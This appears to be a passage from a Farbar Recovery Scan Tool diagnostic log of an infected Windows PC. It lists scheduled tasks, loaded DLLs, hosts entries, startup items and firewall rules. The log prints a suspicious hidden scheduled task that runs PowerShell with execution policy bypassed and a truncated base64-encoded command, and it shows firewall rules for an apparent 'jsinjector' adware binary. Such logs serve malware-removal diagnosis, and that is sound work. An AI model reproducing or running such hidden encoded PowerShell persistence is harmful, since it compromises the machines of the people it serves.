Task: {F0D5C121-195F-4001-9B8B-5650699451C7} - System32\Tasks\{04090E47-0E7A-0A09-0A11-7D7A0905110D} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAAcgBvAGcA (the data entry has 9388 more characters). <==== ATTENTION
Task: {F34232F7-00D2-49E0-8A9A-236C34FC184E} - System32\Tasks\{B719C303-4747-455A-B3FE-1D627710A978} => pcalua.exe -a C:\Users\pcw\Desktop\milionar_lt.exe -d C:\Users\pcw\Desktop
Task: {F797E113-7D13-4DD0-9E5F-38D803ECEE8E} - System32\Tasks\Games\UpdateCheck_S-1-5-21-4246815794-1745546178-596238576-1000
Task: {F7C00807-871D-4C30-ADBA-81FA9AAC2923} - System32\Tasks\{CB50C5BC-2E0C-4BF8-A0BE-9B1908A49EBC} => Chrome.exe hxxp://ui.skype.com/ui/0/5.3.0.120.280/en/abandoninstall?page=tsMain&installinfo=google-toolbar:notoffered;notincluded,google-chrome&#058;notoffered;ienotdefaultbrowser2
Task: {F89990A0-E2B2-449B-9189-935D0BFBEDBA} - \ConfigFree Startup Programs -> No File <==== ATTENTION
Task: {FF09C42A-84A7-46B6-9FE3-2E16B2699364} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-09-01] (Google Inc.)

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\WINDOWS\Tasks\Adobe Flash Player PPAPI Notifier.job => C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_19_0_0_185_pepper.exe
Task: C:\WINDOWS\Tasks\DropboxUpdateTaskUserS-1-5-21-4246815794-1745546178-596238576-500Core.job => C:\Users\Administrator\AppData\Local\Dropbox\Update\DropboxUpdate.exe
Task: C:\WINDOWS\Tasks\DropboxUpdateTaskUserS-1-5-21-4246815794-1745546178-596238576-500UA.job => C:\Users\Administrator\AppData\Local\Dropbox\Update\DropboxUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-4246815794-1745546178-596238576-1000Core.job => C:\Users\pcw\AppData\Local\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-4246815794-1745546178-596238576-1000UA.job => C:\Users\pcw\AppData\Local\Google\Update\GoogleUpdate.exe

==================== Shortcuts =============================

(The entries could be listed to be restored or removed.)

==================== Loaded Modules (Whitelisted) ==============

2009-09-02 09:46 - 2009-09-02 09:46 - 00022016 _____ () C:\WINDOWS\System32\BsTrace.dll
2014-08-16 22:43 - 2015-10-13 05:34 - 00105640 _____ () C:\Program Files\Microsoft Office 15\ClientX64\ApiClient.dll
2009-09-02 09:46 - 2009-09-02 09:46 - 00009728 _____ () C:\Windows\system32\BsHelpCSps.dll
2015-10-30 08:18 - 2015-10-30 08:18 - 00185856 _____ () C:\WINDOWS\SYSTEM32\ism32k.dll
2015-12-18 05:10 - 2015-10-13 18:26 - 00125616 _____ () C:\Program Files\NVIDIA Corporation\Display\NvSmartMax64.dll
2016-04-12 21:54 - 2016-03-29 11:20 - 02656952 _____ () C:\WINDOWS\system32\CoreUIComponents.dll
2016-04-12 21:54 - 2016-03-29 11:20 - 02656952 _____ () C:\WINDOWS\System32\CoreUIComponents.dll
2008-03-07 13:54 - 2008-03-07 13:54 - 17892352 _____ () C:\Windows\system32\BsLangInDepRes.dll
2009-09-02 09:46 - 2009-09-02 09:46 - 00022016 _____ () C:\Windows\system32\BsTrace.dll
2016-04-21 20:35 - 2016-04-21 20:35 - 00959176 _____ () C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\17.3.6386.0412\amd64\ClientTelemetry.dll
2015-10-28 16:25 - 2015-09-01 17:04 - 08901184 _____ () C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX64\Microsoft Office\Office15\1033\GrooveIntlResource.dll
2015-12-18 23:43 - 2015-12-07 05:14 - 00093696 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\Windows.UI.Shell.SharedUtilities.dll
2016-04-12 21:52 - 2016-04-02 04:25 - 00472064 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\QuickActions.dll
2016-04-12 21:53 - 2016-04-02 04:03 - 07992832 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll
2016-04-12 21:53 - 2016-04-02 03:58 - 00591360 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2016-04-12 21:54 - 2016-04-02 03:59 - 02483200 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll
2016-04-12 21:54 - 2016-04-02 04:02 - 04089856 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll
2016-04-19 17:24 - 2016-04-19 17:25 - 00144384 _____ () C:\Program Files\WindowsApps\Microsoft.Messaging_2.15.20002.0_x86__8wekyb3d8bbwe\SkypeHost.exe
2016-03-14 21:03 - 2016-03-14 21:03 - 00173056 _____ () C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.8.4181.0_x64__8wekyb3d8bbwe\CellNativeClientUniversal.dll
2015-09-25 23:35 - 2015-09-25 23:36 - 04485808 _____ () C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.8.4181.0_x64__8wekyb3d8bbwe\Microsoft.Advertising.dll
2016-03-14 21:03 - 2016-03-14 21:03 - 03128832 _____ () C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.8.4181.0_x64__8wekyb3d8bbwe\Avatars.dll
2016-02-19 21:13 - 2016-02-19 21:13 - 00113496 _____ () C:\Program Files\Alwil Software\Avast5\log.dll
2016-02-19 21:13 - 2016-02-19 21:13 - 00133768 _____ () C:\Program Files\Alwil Software\Avast5\JsonRpcServer.dll
2016-04-21 20:31 - 2016-04-21 20:31 - 02890240 _____ () C:\Program Files\Alwil Software\Avast5\defs\16042103\algo.dll
2016-04-14 19:44 - 2016-04-14 19:44 - 00509344 _____ () C:\Program Files\Alwil Software\Avast5\ffl2.dll
2016-04-22 20:22 - 2016-04-22 20:22 - 02890240 _____ () C:\Program Files\Alwil Software\Avast5\defs\16042201\algo.dll
2009-09-02 09:46 - 2009-09-02 09:46 - 00022016 _____ () C:\WINDOWS\SYSTEM32\BsTrace.dll
2009-09-02 09:46 - 2009-09-02 09:46 - 00009728 _____ () C:\Windows\SYSTEM32\BsHelpCSps.dll
2009-09-02 09:43 - 2009-09-02 09:43 - 00114808 _____ () C:\Program Files (x86)\IVT Corporation\BlueSoleil\setup.dll
2016-04-21 20:35 - 2016-04-21 20:35 - 00679624 _____ () C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\17.3.6386.0412\ClientTelemetry.dll
2016-04-15 21:07 - 2016-04-13 09:37 - 01738904 _____ () C:\Program Files (x86)\Google\Chrome\Application\50.0.2661.75\libglesv2.dll
2016-04-15 21:07 - 2016-04-13 09:36 - 00086168 _____ () C:\Program Files (x86)\Google\Chrome\Application\50.0.2661.75\libegl.dll
2016-04-15 20:10 - 2016-03-21 22:50 - 00034768 _____ () C:\Users\Administrator\AppData\Roaming\Dropbox\bin\_multiprocessing.pyd
2016-04-15 20:10 - 2016-03-21 22:51 - 00019408 _____ () C:\Users\Administrator\AppData\Roaming\Dropbox\bin\faulthandler.pyd
2016-04-15 20:10 - 2016-03-21 22:50 - 00116688 _____ () C:\Users\Administrator\AppData\Roaming\Dropbox\bin\pywintypes27.dll
2016-04-15 20:10 - 2016-03-21 22:50 - 00093640 _____ () C:\Users\Administrator\AppData\Roaming\Dropbox\bin\_ctypes.pyd
2016-04-15 20:10 - 2016-03-21 22:50 - 00018376 _____ () C:\Users\Administrator\AppData\Roaming\Dropbox\bin\select.pyd
2016-04-15 20:10 - 2016-04-08 19:20 - 00019760 _____ () C:\Users\Administrator\AppData\Roaming\Dropbox\bin\tornado.speedups.pyd
2016-04-15 20:10 - 2016-03-21 22:52 - 00105928 _____ () C:\Users\Administrator\AppData\Roaming\Dropbox\bin\win32api.pyd
2016-04-15 20:10 - 2016-03-21 22:50 - 00392144 _____ () C:\Users\Administrator\AppData\Roaming\Dropbox\bin\pythoncom27.dll
2016-04-15 20:10 - 2016-04-08 19:20 - 00381752 _____ () C:\Users\Administrator\AppData\Roaming\Dropbox\bin\win32com.shell.shell.pyd
2016-04-15 20:10 - 2016-03-21 22:50 - 00692688 _____ () C:\Users\Administrator\AppData\Roaming\Dropbox\bin\unicodedata.pyd
2016-04-15 20:10 - 2016-04-08 19:19 - 00020816 _____ () C:\Users\Administrator\AppData\Roaming\Dropbox\bin\cryptography.hazmat.bindings._constant_time.pyd
2016-04-15 20:10 - 2016-03-21 22:51 - 00112592 _____ () C:\Users\Administrator\AppData\Roaming\Dropbox\bin\_cffi_backend.pyd
2016-04-15 20:10 - 2016-04-08 19:19 - 01682760 _____ () C:\Users\Administrator\AppData\Roaming\Dropbox\bin\cryptography.hazmat.bindings._openssl.pyd
2016-04-15 20:10 - 2016-04-08 19:19 - 00020808 _____ () C:\Users\Administrator\AppData\Roaming\Dropbox\bin\cryptography.hazmat.bindings._padding.pyd
2016-04-15 20:10 - 2016-04-08 19:20 - 00021840 _____ () C:\Users\Administrator\AppData\Roaming\Dropbox\bin\_cffi_unicode_environ_win32_x8bf8e68bx9968e850.pyd
2016-04-15 20:10 - 2016-04-08 19:19 - 00038696 _____ () C:\Users\Administrator\AppData\Roaming\Dropbox\bin\fastpath.pyd
2016-04-15 20:10 - 2016-03-21 22:52 - 00020936 _____ () C:\Users\Administrator\AppData\Roaming\Dropbox\bin\mmapfile.pyd
2016-04-15 20:10 - 2016-03-21 22:52 - 00024528 _____ () C:\Users\Administrator\AppData\Roaming\Dropbox\bin\win32event.pyd
2016-04-15 20:10 - 2016-03-21 22:52 - 00114640 _____ () C:\Users\Administrator\AppData\Roaming\Dropbox\bin\win32security.pyd
2016-04-15 20:10 - 2016-03-21 22:52 - 00124880 _____ () C:\Users\Administrator\AppData\Roaming\Dropbox\bin\win32file.pyd
2016-04-15 20:10 - 2016-04-08 19:20 - 00021832 _____ () C:\Users\Administrator\AppData\Roaming\Dropbox\bin\_cffi_pywin_kernel32_x64d8f881xc8c369be.pyd
2016-04-15 20:10 - 2016-03-21 22:52 - 00024016 _____ () C:\Users\Administrator\AppData\Roaming\Dropbox\bin\win32clipboard.pyd
2016-04-15 20:10 - 2016-03-21 22:52 - 00175560 _____ () C:\Users\Administrator\AppData\Roaming\Dropbox\bin\win32gui.pyd
2016-04-15 20:10 - 2016-03-21 22:52 - 00030160 _____ () C:\Users\Administrator\AppData\Roaming\Dropbox\bin\win32pipe.pyd
2016-04-15 20:10 - 2016-03-21 22:52 - 00043472 _____ () C:\Users\Administrator\AppData\Roaming\Dropbox\bin\win32process.pyd
2016-04-15 20:10 - 2016-03-21 22:52 - 00028616 _____ () C:\Users\Administrator\AppData\Roaming\Dropbox\bin\win32ts.pyd
2016-04-15 20:10 - 2016-03-21 22:52 - 00048592 _____ () C:\Users\Administrator\AppData\Roaming\Dropbox\bin\win32service.pyd
2016-04-15 20:10 - 2016-04-08 19:19 - 00026456 _____ () C:\Users\Administrator\AppData\Roaming\Dropbox\bin\dropbox.infinite.win.compiled._driverinstallation.pyd
2016-04-15 20:10 - 2016-03-21 22:52 - 00057808 _____ () C:\Users\Administrator\AppData\Roaming\Dropbox\bin\win32evtlog.pyd
2016-04-15 20:10 - 2016-03-21 22:52 - 00024016 _____ () C:\Users\Administrator\AppData\Roaming\Dropbox\bin\win32profile.pyd
2016-04-15 20:10 - 2016-04-08 19:19 - 00117056 _____ () C:\Users\Administrator\AppData\Roaming\Dropbox\bin\breakpad.client.windows.handler.pyd
2016-04-15 20:10 - 2016-04-08 19:20 - 00023376 _____ () C:\Users\Administrator\AppData\Roaming\Dropbox\bin\winscreenshot.compiled._CaptureScreenshot.pyd
2016-04-15 20:10 - 2016-03-21 22:50 - 00134608 _____ () C:\Users\Administrator\AppData\Roaming\Dropbox\bin\_elementtree.pyd
2016-04-15 20:10 - 2016-03-21 22:50 - 00134088 _____ () C:\Users\Administrator\AppData\Roaming\Dropbox\bin\pyexpat.pyd
2016-04-15 20:10 - 2016-03-21 22:51 - 00240584 _____ () C:\Users\Administrator\AppData\Roaming\Dropbox\bin\jpegtran.pyd
2016-04-15 20:10 - 2016-04-08 19:19 - 00024392 _____ () C:\Users\Administrator\AppData\Roaming\Dropbox\bin\librsyncffi.compiled._librsyncffi.pyd
2016-04-15 20:10 - 2016-03-21 22:52 - 00036296 _____ () C:\Users\Administrator\AppData\Roaming\Dropbox\bin\librsync.dll
2016-04-15 20:10 - 2016-04-08 19:19 - 00031568 _____ () C:\Users\Administrator\AppData\Roaming\Dropbox\bin\enterprise_data.compiled._enterprise_data.pyd
2016-04-15 20:10 - 2016-03-12 01:46 - 00293392 _____ () C:\Users\Administrator\AppData\Roaming\Dropbox\bin\EnterpriseDataAdapter.dll
2016-04-15 20:10 - 2016-04-08 19:19 - 00052024 _____ () C:\Users\Administrator\AppData\Roaming\Dropbox\bin\psutil._psutil_windows.pyd
2016-04-15 20:10 - 2016-04-08 19:20 - 00020800 _____ () C:\Users\Administrator\AppData\Roaming\Dropbox\bin\winffi.iphlpapi._winffi_iphlpapi.pyd
2016-04-15 20:10 - 2016-04-08 19:20 - 00021824 _____ () C:\Users\Administrator\AppData\Roaming\Dropbox\bin\winffi.kernel32._winffi_kernel32.pyd
2016-04-15 20:10 - 2016-04-08 19:20 - 00019776 _____ () C:\Users\Administrator\AppData\Roaming\Dropbox\bin\winffi.winerror._winffi_winerror.pyd
2016-04-15 20:10 - 2016-04-08 19:20 - 00020800 _____ () C:\Users\Administrator\AppData\Roaming\Dropbox\bin\winffi.wininet._winffi_wininet.pyd
2016-04-15 20:10 - 2016-04-08 19:19 - 00020280 _____ () C:\Users\Administrator\AppData\Roaming\Dropbox\bin\cpuid.compiled._cpuid.pyd
2016-04-15 20:10 - 2016-03-21 22:52 - 00350152 _____ () C:\Users\Administrator\AppData\Roaming\Dropbox\bin\winxpgui.pyd
2016-04-15 20:10 - 2016-04-08 19:20 - 00022352 _____ () C:\Users\Administrator\AppData\Roaming\Dropbox\bin\winverifysignature.compiled._VerifySignature.pyd
2016-04-15 20:10 - 2016-04-08 19:19 - 00084280 _____ () C:\Users\Administrator\AppData\Roaming\Dropbox\bin\dropbox_sqlite_ext.DLL
2016-04-15 20:10 - 2016-04-08 19:20 - 01826096 _____ () C:\Users\Administrator\AppData\Roaming\Dropbox\bin\PyQt5.QtCore.pyd
2016-04-15 20:10 - 2016-03-21 22:51 - 00083912 _____ () C:\Users\Administrator\AppData\Roaming\Dropbox\bin\sip.pyd
2016-04-15 20:10 - 2016-04-08 19:20 - 03928880 _____ () C:\Users\Administrator\AppData\Roaming\Dropbox\bin\PyQt5.QtWidgets.pyd
2016-04-15 20:10 - 2016-04-08 19:20 - 01971504 _____ () C:\Users\Administrator\AppData\Roaming\Dropbox\bin\PyQt5.QtGui.pyd
2016-04-15 20:10 - 2016-04-08 19:20 - 00531248 _____ () C:\Users\Administrator\AppData\Roaming\Dropbox\bin\PyQt5.QtNetwork.pyd
2016-04-15 20:10 - 2016-04-08 19:20 - 00132912 _____ () C:\Users\Administrator\AppData\Roaming\Dropbox\bin\PyQt5.QtWebKit.pyd
2016-04-15 20:10 - 2016-04-08 19:20 - 00223544 _____ () C:\Users\Administrator\AppData\Roaming\Dropbox\bin\PyQt5.QtWebKitWidgets.pyd
2016-04-15 20:10 - 2016-04-08 19:20 - 00207672 _____ () C:\Users\Administrator\AppData\Roaming\Dropbox\bin\PyQt5.QtPrintSupport.pyd
2016-04-15 20:10 - 2016-04-08 19:20 - 00158008 _____ () C:\Users\Administrator\AppData\Roaming\Dropbox\bin\PyQt5.QtWebEngineWidgets.pyd
2016-04-15 20:10 - 2016-04-08 19:20 - 00042808 _____ () C:\Users\Administrator\AppData\Roaming\Dropbox\bin\PyQt5.QtWebChannel.pyd
2016-04-15 20:10 - 2016-03-21 22:54 - 00017864 _____ () C:\Users\Administrator\AppData\Roaming\Dropbox\bin\libEGL.dll
2016-04-15 20:10 - 2016-03-21 22:54 - 01631184 _____ () C:\Users\Administrator\AppData\Roaming\Dropbox\bin\libGLESv2.dll
2016-04-15 20:10 - 2016-04-08 19:20 - 00025928 _____ () C:\Users\Administrator\AppData\Roaming\Dropbox\bin\windisplaytoast.compiled._DisplayToast.pyd
2016-04-15 20:10 - 2016-04-08 19:20 - 00024904 _____ () C:\Users\Administrator\AppData\Roaming\Dropbox\bin\_cffi_wpad_proxy_win_x752e3d61xdcfdcc84.pyd
2016-04-15 20:10 - 2016-04-08 19:20 - 00546096 _____ () C:\Users\Administrator\AppData\Roaming\Dropbox\bin\PyQt5.QtQuick.pyd
2016-04-15 20:10 - 2016-04-08 19:20 - 00357680 _____ () C:\Users\Administrator\AppData\Roaming\Dropbox\bin\PyQt5.QtQml.pyd
2016-04-15 20:10 - 2016-03-21 22:56 - 00697304 _____ () C:\Users\Administrator\AppData\Roaming\Dropbox\bin\QtQuick\Controls\qtquickcontrolsplugin.dll
2016-04-22 20:26 - 2016-04-22 20:26 - 00385024 _____ () C:\Users\Administrator\AppData\Local\Temp\libsqlitejdbc-5970184997880942952.lib
2016-01-04 22:57 - 2016-01-04 22:57 - 40539648 _____ () C:\Program Files\Alwil Software\Avast5\libcef.dll
2016-03-15 21:27 - 2016-03-15 21:27 - 00325824 _____ () C:\Program Files\Microsoft Office 15\Root\VFS\ProgramFilesCommonX86\Microsoft Shared\OFFICE15\AppVIsvStream32.dll
2016-04-19 17:24 - 2016-04-19 17:25 - 00141312 _____ () C:\Program Files\WindowsApps\Microsoft.Messaging_2.15.20002.0_x86__8wekyb3d8bbwe\SkypeBackgroundTasks.dll
2016-04-19 17:24 - 2016-04-19 17:25 - 22284800 _____ () C:\Program Files\WindowsApps\Microsoft.Messaging_2.15.20002.0_x86__8wekyb3d8bbwe\SkyWrap.dll

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)


==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)


==================== EXE Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)


==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)


==================== Hosts content: ==========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2015-05-04 17:53 - 2016-02-29 01:58 - 00000986 ____A C:\WINDOWS\system32\Drivers\etc\hosts

127.0.0.1 down.baidu2016.com
127.0.0.1 123.sogou.com
127.0.0.1 www.czzsyzgm.com
127.0.0.1 www.czzsyzxl.com

==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-4246815794-1745546178-596238576-500\Control Panel\Desktop\\Wallpaper -> C:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\LocalState\PhotosAppBackground\{a7e077df-6f3d-48b4-b24a-3af8c7aae5cb}.jpg
DNS Servers: 192.168.0.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

(Currently there is no automatic fix for this section.)

MSCONFIG\Services: Apple Mobile Device => 2
MSCONFIG\Services: BecHelperService => 2
MSCONFIG\Services: cfWiMAXService => 2
MSCONFIG\Services: ConfigFree Service => 2
MSCONFIG\Services: gupdate => 2
MSCONFIG\Services: IAStorDataMgrSvc => 2
MSCONFIG\Services: iPod Service => 3
MSCONFIG\Services: LMS => 2
MSCONFIG\Services: nvsvc => 2
MSCONFIG\Services: TemproMonitoringService => 2
MSCONFIG\Services: Thpsrv => 2
MSCONFIG\Services: TMachInfo => 3
MSCONFIG\Services: TODDSrv => 2
MSCONFIG\Services: TosCoSrv => 2
MSCONFIG\Services: TOSHIBA eco Utility Service => 2
MSCONFIG\Services: TOSHIBA HDD SSD Alert Service => 3
MSCONFIG\Services: TPCHSrv => 3
MSCONFIG\Services: UNS => 2
MSCONFIG\startupreg: DAEMON Tools Lite => "C:\Program Files (x86)\DAEMON Tools Lite\DTLite.exe" -autorun
HKLM\...\StartupApproved\Run: => "Toshiba Registration"
HKLM\...\StartupApproved\Run32: => "BtTray"
HKU\S-1-5-21-4246815794-1745546178-596238576-500\...\StartupApproved\Run: => "Remote Mouse"

==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139
FirewallRules: [MSMQ-In-TCP] => (Allow) %systemroot%\system32\mqsvc.exe
FirewallRules: [MSMQ-Out-TCP] => (Allow) %systemroot%\system32\mqsvc.exe
FirewallRules: [MSMQ-In-UDP] => (Allow) %systemroot%\system32\mqsvc.exe
FirewallRules: [MSMQ-Out-UDP] => (Allow) %systemroot%\system32\mqsvc.exe
FirewallRules: [WCF-NetTcpActivator-In-TCP-64bit] => (Allow) LPort=808
FirewallRules: [{8372EF70-543D-4ED8-804C-7842D48704C8}] => (Allow) C:\Program Files\Microsoft Office 15\root\Office15\UcMapi.exe
FirewallRules: [{454FCEF1-0D59-4900-B70C-FBF66565C053}] => (Allow) C:\Program Files\Microsoft Office 15\root\Office15\Lync.exe
FirewallRules: [{6DFFF19A-5205-4C4F-A43D-55D7D1A2AF3F}] => (Allow) C:\Program Files\Microsoft Office 15\root\Office15\UcMapi.exe
FirewallRules: [{1023B708-3C83-4931-B92E-F7792C471AAF}] => (Allow) C:\Program Files\Microsoft Office 15\root\Office15\Lync.exe
FirewallRules: [{C87D982E-2DCF-4176-BD52-7685F80AD7E1}] => (Allow) C:\Program Files\Microsoft Office 15\root\Office15\outlook.exe
FirewallRules: [UDP Query User{FE50F189-D1E1-4D1A-9E14-0F54AB07D195}C:\program files (x86)\java\jre1.8.0_31\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_31\bin\javaw.exe
FirewallRules: [TCP Query User{19EC8BDD-8F7C-43C5-8367-B7A6DA4CAD42}C:\program files (x86)\java\jre1.8.0_31\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_31\bin\javaw.exe
FirewallRules: [UDP Query User{496EB30E-54D8-4633-8931-69D6D0FACCEA}C:\program files (x86)\remote mouse\remotemouse.exe] => (Allow) C:\program files (x86)\remote mouse\remotemouse.exe
FirewallRules: [TCP Query User{BD8F755D-450E-422E-A85F-0D0F6A06E30D}C:\program files (x86)\remote mouse\remotemouse.exe] => (Allow) C:\program files (x86)\remote mouse\remotemouse.exe
FirewallRules: [{A297315D-B247-46E2-B2C2-6F3963BCF3C6}] => (Allow) C:\Program Files (x86)\IVT Corporation\BlueSoleil\BlueSoleilCS.exe
FirewallRules: [{1BF48D9F-DF5E-4387-A2CD-CB80874D0527}] => (Allow) C:\Program Files (x86)\IVT Corporation\BlueSoleil\BlueSoleilCS.exe
FirewallRules: [{979106D8-5B94-4C84-B362-3239DAC28BEF}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [TCP Query User{635C3F99-C974-4430-9CFA-1B29FAD126F8}C:\program files (x86)\vuze\azureus.exe] => (Allow) C:\program files (x86)\vuze\azureus.exe
FirewallRules: [UDP Query User{F60A2823-1848-4D05-96D1-F0B162038C6A}C:\program files (x86)\vuze\azureus.exe] => (Allow) C:\program files (x86)\vuze\azureus.exe
FirewallRules: [{156A9C93-1C7C-4546-9700-A73955BE54BE}] => (Allow) C:\Program Files (x86)\Vuze\Azureus.exe
FirewallRules: [{891F6A02-CC56-4F89-AED6-B96FB41271BB}] => (Allow) C:\Program Files (x86)\Vuze\Azureus.exe
FirewallRules: [{AF793068-D948-4F96-92F2-78D3C9DA20FB}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{23011A93-2744-4DAC-82CB-D921D9607590}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{AA990127-17ED-4E15-94A8-D5DC6A5F72A1}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{D119C592-22A6-44C6-87C6-A917845F477E}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{5C48F6A2-1FAA-475F-A5D9-4D99B5D1543A}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{D8ABC1D4-2BEC-49E2-8A32-370107136DEC}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{41EFBA00-2592-46D1-AFFF-8C88B7BBACF4}] => (Allow) C:\program files (x86)\remote mouse\remotemouse.exe
FirewallRules: [{AE21FA56-799F-4D75-A3C2-9038C8711B01}] => (Allow) C:\program files (x86)\remote mouse\remotemouse.exe
FirewallRules: [TCP Query User{06AC167E-9345-4E67-8923-0B9775C0C74A}C:\program files (x86)\pes 13\pes2013.exe] => (Allow) C:\program files (x86)\pes 13\pes2013.exe
FirewallRules: [UDP Query User{0A6D2ED9-DAFC-4A13-9011-2197C8683564}C:\program files (x86)\pes 13\pes2013.exe] => (Allow) C:\program files (x86)\pes 13\pes2013.exe
FirewallRules: [TCP Query User{0126F709-8266-4591-BC0B-D62217A6B074}D:\games\firewatch\firewatch.exe] => (Allow) D:\games\firewatch\firewatch.exe
FirewallRules: [UDP Query User{7FB62E35-0D62-4D6A-A523-F5DFFC944E6B}D:\games\firewatch\firewatch.exe] => (Allow) D:\games\firewatch\firewatch.exe
FirewallRules: [{301E5091-E852-45AE-8424-83E07AFF4875}] => (Block) D:\games\firewatch\firewatch.exe
FirewallRules: [{C5A13A08-0487-4C01-BFBA-2F250E55343B}] => (Block) D:\games\firewatch\firewatch.exe
FirewallRules: [{0D108194-059D-4D54-B641-926C4DEFEDC2}] => (Allow) C:\Program Files\NewExt\jsinjector.exe
FirewallRules: [{A1C76515-C1DA-4426-879D-B5BA5082DD2A}] => (Allow) C:\Program Files\NewExt\jsinjector.exe
FirewallRules: [{86A9C8BE-2655-4563-85BA-232498F71B13}] => (Allow) C:\Program Files\NewExt\jsinjector.exe
FirewallRules: [{C604DF57-6104-4AF1-A6F0-A4E048036CA6}] => (Allow) C:\Program Files\NewExt\jsinjector.exe
FirewallRules: [{0FFB4464-E682-497F-9F10-561B91CE76BC}] => (Allow) C:\Program Files\NewExt\jsinjector.exe
FirewallRules: [{99E5E200-D0A5-4417-87C4-3F0EEF0A1370}] => (Allow) C:\Program Files\NewExt\jsinjector.exe
FirewallRules: [{89CE51B9-03AF-4D57-959C-001351F744C2}] => (Allow) C:\Program Files\NewExt\jsinjector.exe
FirewallRules: [{421A7ECB-F976-406B-9D3E-A54A3BAFA67F}] => (Allow) C:\Program Files\NewExt\jsinjector.exe
FirewallRules: [{AFE66024-5E24-4508-9AB8-06379192B795}] => (Allow) C:\Program Files\NewExt\jsinjector.exe
FirewallRules: [{1991A45B-BBA8-4DC5-9E68-6091852402D0}] => (Allow) C:\Program Files\NewExt\jsinjector.exe
FirewallRules: [{E30A6B14-812D-4828-B74E-A1DA8A7F82F5}] => (Allow) C:\Program Files\NewExt\jsinjector.exe
FirewallRules: [{20E4A0CE-7671-415F-880B-5AD89E7B5B87}] => (Allow) C:\Program Files\NewExt\jsinjector.exe
FirewallRules: [{4BBF11B4-9A39-4577-8E20-3AB6B5A0E665}] => (Allow) C:\Users\Administrator\AppData\Local\Chromium\Application\chrome.exe
FirewallRules: [{EBEB3AD9-97B5-49E4-A1F9-D70E33B67EA7}] => (Allow) C:\Program Files\NewExt\jsinjector.exe
FirewallRules: [{211A003F-A471-4B99-B72D-21955183895C}] => (Allow) C:\Program Files\NewExt\jsinjector.exe
FirewallRules: [{BE0F3DAF-D762-4B80-A968-1163758892D0}] => (Allow) C:\Program Files\NewExt\jsinjector.exe
FirewallRules: [{2DC2B3FF-9BE7-486D-A6A1-991AB47478D9}] => (Allow) C:\Windows\dwrcs\DWRCS.EXE
FirewallRules: [{73C4ADED-D0C2-456B-A014-2D3723905903}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

==================== Restore Points =========================

01-04-2016 21:18:18 Scheduled Checkpoint
11-04-2016 20:24:58 Scheduled Checkpoint
17-04-2016 22:58:31 Installed Samsung Kies3

==================== Faulty Device Manager Devices =============


==================== Event log errors: =========================

Application errors:
==================
Error: (04/22/2016 08:22:23 PM) (Source: Office 2013 Licensing Service) (EventID: 0) (User: )
Description: Subscription licensing service failed: -1073418219

Error: (04/21/2016 08:44:37 PM) (Source: TOSHIBA Service Station) (EventID: 0) (User: )
Description: The following module failed to stop processing: Software Updates. Error: Operation failed.

